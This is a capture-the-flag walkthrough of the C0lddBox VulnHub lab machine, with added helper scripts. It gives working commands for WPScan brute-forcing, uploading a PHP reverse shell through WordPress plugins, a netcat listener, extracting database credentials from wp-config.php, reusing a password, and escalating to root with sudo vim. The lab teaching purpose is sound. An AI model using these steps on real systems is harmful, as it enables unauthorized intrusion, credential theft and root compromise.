C0lddBox: Easy Vulnhub Walkthrough

Hello Hackers,

Let’s read some Cybersecurity Blogs…

Today we will solve the C0lddBox VulnHub machine, which is rated EASY.

Let's start. Once you have imported the C0lddBox VM into VirtualBox, boot the machine.

First, sweep the local network to find the machine's IP address. This is a ping sweep only (-sn: host discovery, no port scan), so it is quick and quiet:

sudo nmap -sn 192.168.0.1/24

The sweep lists the machine's IP address; mine was 192.168.0.123. Next, port-scan that host to find the open ports and the services behind them.

Only one port is open on the machine, 80/tcp (HTTP), so we can browse to the IP address.
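The discovery and port-scan steps above, as an added example that is not part of the original walkthrough: the two nmap invocations are wrapped in a function you run by hand, and a small parser turns nmap's grepable (-oG) report into a list of open ports so the result can feed later commands. The target address 192.168.0.123 is taken from the post; the sample scan report is constructed to match the post's finding (only 80/tcp open).

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Host discovery and full
# port scan of the C0lddBox target, plus a parser for nmap's grepable output.
# Assumptions: target is 192.168.0.123 (as in the post); the SAMPLE_GNMAP
# report below is constructed, not real scan output.

TARGET="${TARGET:-192.168.0.123}"

# Ping sweep (-sn: host discovery only), then a full TCP scan of the host we
# found (-p-: all 65535 ports, -sV: service versions, -oG: grepable report).
# Needs root for ARP-based discovery and SYN scanning. Not run automatically.
scan_target() {
  sudo nmap -sn 192.168.0.1/24
  sudo nmap -p- -sV -oG "nmap_${1}.gnmap" "$1"
}

# Print the open TCP ports of a grepable nmap report, one "port/service" per
# line. A grepable port line looks like:
#   Host: 192.168.0.123 ()  Ports: 80/open/tcp//http//Apache httpd 2.4.18/
# Entries after "Ports:" are comma separated; each entry is
#   port/state/proto/owner/service/rpc/version/
open_ports() {
  grep '^Host:.*Ports:' "$1" \
    | sed 's/.*Ports: //; s/[[:space:]]*Ignored State:.*//' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//' \
    | awk -F/ '$2 == "open" { print $1 "/" $5 }'
}

# Constructed sample report: one open port (80), plus a closed and a filtered
# port to show that non-open states are skipped.
SAMPLE_GNMAP="$(mktemp)"
trap 'rm -f "$SAMPLE_GNMAP"' EXIT
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.91 scan initiated as: nmap -p- -sV -oG nmap_192.168.0.123.gnmap 192.168.0.123
Host: 192.168.0.123 ()  Status: Up
Host: 192.168.0.123 ()  Ports: 22/closed/tcp//ssh///, 80/open/tcp//http//Apache httpd 2.4.18 ((Ubuntu))/, 443/filtered/tcp//https///  Ignored State: closed (65532)
# Nmap done -- 1 IP address (1 host up) scanned in 30.00 seconds
EOF

open_ports "$SAMPLE_GNMAP"   # prints: 80/http
# Real use: scan_target "$TARGET"; open_ports "nmap_${TARGET}.gnmap"
```

Against the real box, run scan_target first and point open_ports at the report it writes; the output here shows only 80/http, which is why the rest of the walkthrough is all about the web application.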

This is the landing page of the C0lddBox machine; now we need to explore it.

We find a login page, and it is the WordPress login page, so the site is built on WordPress.

Seeing this, I immediately used WPScan to enumerate users, pointing it at the site with the flags below:

wpscan --url http://192.168.0.123 -e u

-e = enumerate
 u = users

It found 4 users, but one of them is not valid, so we continue with 3.

"the cold in person" is not a valid username; leaving it out, we are left with c0ldd, Philip and Hugo.

Put those three usernames in a file, then brute-force the login panel, using rockyou.txt as the password list:

wpscan --url http://192.168.0.123 -U user.txt -P /Documents/rockyou.txt
-U = Username file location
-P = Password file location

After a few seconds of brute-forcing it returned the password of the c0ldd user:

user=c0ldd & password=9876543210

Log in with these credentials and we land in the WordPress dashboard.

Now we look for a place where we can upload a reverse shell and get a connection back, and we find the Plugins section.

Plugin >> Add new

Click Add New and you get an option to upload.

Now we need a web shell. Kali Linux ships PHP web shells by default, and we will upload one of those:

ls /usr/share/webshells/php

Edit php-reverse-shell.php before uploading: set $ip to the IP address of your attacking machine, where the connection should come back to, and make sure $port matches the listener you will start.

Change the IP address, then upload the file.

With the upload done, requesting php-reverse-shell.php in the browser will trigger the shell.

Before doing that, start a Netcat listener on the port set in the file:

nc -nvlp 1234
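The edit-then-upload step above, as an added example that is not part of the original walkthrough: it rewrites the $ip and $port lines of a copy of pentestmonkey's php-reverse-shell.php (the one Kali ships under /usr/share/webshells/php/) and then reads the values back so they can be checked against the listener before the file is uploaded. The attacker address 192.168.0.10 is an assumption; the port is the walkthrough's 1234. The file contents below are a constructed stand-in containing only the header lines that matter.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Prepares a copy of
# php-reverse-shell.php with our listener address/port and verifies the edit.
# Assumptions: attacker IP 192.168.0.10; port 1234 as in the post; the SRC
# file below is a constructed stand-in for the real shell's header.

LHOST="${LHOST:-192.168.0.10}"
LPORT="${LPORT:-1234}"

# Rewrite the two configuration lines near the top of the shell:
#   $ip = '127.0.0.1';  // CHANGE THIS
#   $port = 1234;       // CHANGE THIS
# Arguments: source file, destination file, listener ip, listener port.
# [$] in the patterns is a literal dollar sign (keeps the shell from expanding it).
configure_shell() {
  case "$3" in *[!0-9.]*|'') printf 'bad listener ip: %s\n' "$3" >&2; return 1;; esac
  case "$4" in *[!0-9]*|'') printf 'bad listener port: %s\n' "$4" >&2; return 1;; esac
  sed -e "s/^\([$]ip = \)'[^']*';/\1'$3';/" \
      -e "s/^\([$]port = \)[0-9]*;/\1$4;/" \
      "$1" > "$2"
}

# Print "ip port" as the prepared shell will dial them, so the values can be
# compared with the netcat listener before uploading.
shell_target() {
  ip=$(sed -n "s/^[$]ip = '\([^']*\)';.*/\1/p" "$1")
  port=$(sed -n 's/^[$]port = \([0-9]*\);.*/\1/p' "$1")
  echo "$ip $port"
}

# Constructed stand-in for the real file (only the lines that matter).
# On Kali use: SRC=/usr/share/webshells/php/php-reverse-shell.php
SRC="$(mktemp)"; DST="$(mktemp)"
trap 'rm -f "$SRC" "$DST"' EXIT
cat > "$SRC" <<'EOF'
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
EOF

configure_shell "$SRC" "$DST" "$LHOST" "$LPORT"
shell_target "$DST"   # prints: 192.168.0.10 1234
# Next: upload "$DST" as php-reverse-shell.php via Plugins > Add New, start
#   nc -nvlp "$LPORT"
# and request the uploaded file in the browser to get the callback.
```

The read-back matters more than it looks: a shell that dials the stock 127.0.0.1 simply connects to the victim itself and the listener never fires, which is easy to mistake for a failed upload.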

I got the shell, but it needs upgrading to an interactive one, because the raw shell is messy: there is no prompt and we cannot see the directory changing.

python3 -c 'import pty;pty.spawn("/bin/bash")'

As the site runs on WordPress, there is always a wp-config.php holding the database username and password, and it sits in the web root (the html folder). Open it with cat:

cd /var/www/html
cat wp-config.php

Here we get the database password for the user c0ldd. Passwords are often reused, so try it against the system account of the same name with su:
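Reading the credentials out of wp-config.php, as an added example that is not part of the original walkthrough: in a half-interactive reverse shell it is more convenient to pull just the define() constants than to scroll through the whole file. The wp-config.php content below is constructed (the password in it is a placeholder, not the box's real one); on the target the file is /var/www/html/wp-config.php.

```shell
#!/bin/sh
# Added example, not from the original walkthrough. Extracts the database
# settings from a WordPress wp-config.php. The CFG file below is a constructed
# sample; on the target use /var/www/html/wp-config.php.

# Print the value of one define('NAME', 'value') constant. Accepts single- or
# double-quoted names and values and the "define( 'X', 'y' );" spacing that
# WordPress uses. Arguments: config file, constant name.
wp_define() {
  sed -n "s/^[[:space:]]*define[[:space:]]*([[:space:]]*['\"]$2['\"][[:space:]]*,[[:space:]]*['\"]\([^'\"]*\)['\"].*/\1/p" "$1"
}

# Summarise the DB settings as user:password@host/db.
wp_db_summary() {
  printf '%s:%s@%s/%s\n' \
    "$(wp_define "$1" DB_USER)" \
    "$(wp_define "$1" DB_PASSWORD)" \
    "$(wp_define "$1" DB_HOST)" \
    "$(wp_define "$1" DB_NAME)"
}

# Constructed sample config (placeholder password, not the real one).
CFG="$(mktemp)"
trap 'rm -f "$CFG"' EXIT
cat > "$CFG" <<'EOF'
<?php
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'c0ldd' );
/** MySQL database password */
define( 'DB_PASSWORD', 'S3cretDbPass' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
define( 'DB_CHARSET', 'utf8' );
define( 'AUTH_KEY', "put your unique phrase here" );
$table_prefix = 'wp_';
EOF

wp_db_summary "$CFG"   # prints: c0ldd:S3cretDbPass@localhost/wordpress
# On the target: wp_db_summary /var/www/html/wp-config.php
# then try the DB password for the matching system account: su c0ldd
```

The same function also pulls the AUTH_KEY/SALT values, which matter if you want to forge WordPress session cookies rather than reuse the password.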

su c0ldd

That worked: we have moved from www-data to c0ldd, and can now grab user.txt, the first flag.

The flag is base64-encoded Spanish text: base64-decode it, then translate from Spanish to English.

After trying several privilege-escalation techniques, I found a useful one: check what this user is allowed to run with sudo.

sudo -l

Great, vim can be run with sudo. Because vim then runs as root, its :sh command spawns a shell as root:

sudo /usr/bin/vim
:sh

Once that is done, grab root.txt from the root directory.

As with the first flag: base64-decode it, then translate from Spanish to English.

Boom!! We have solved the machine.

The video of the c0lddBox CTF is linked below:

It’s time to say GOODBYE for now…

Happy hacking!!
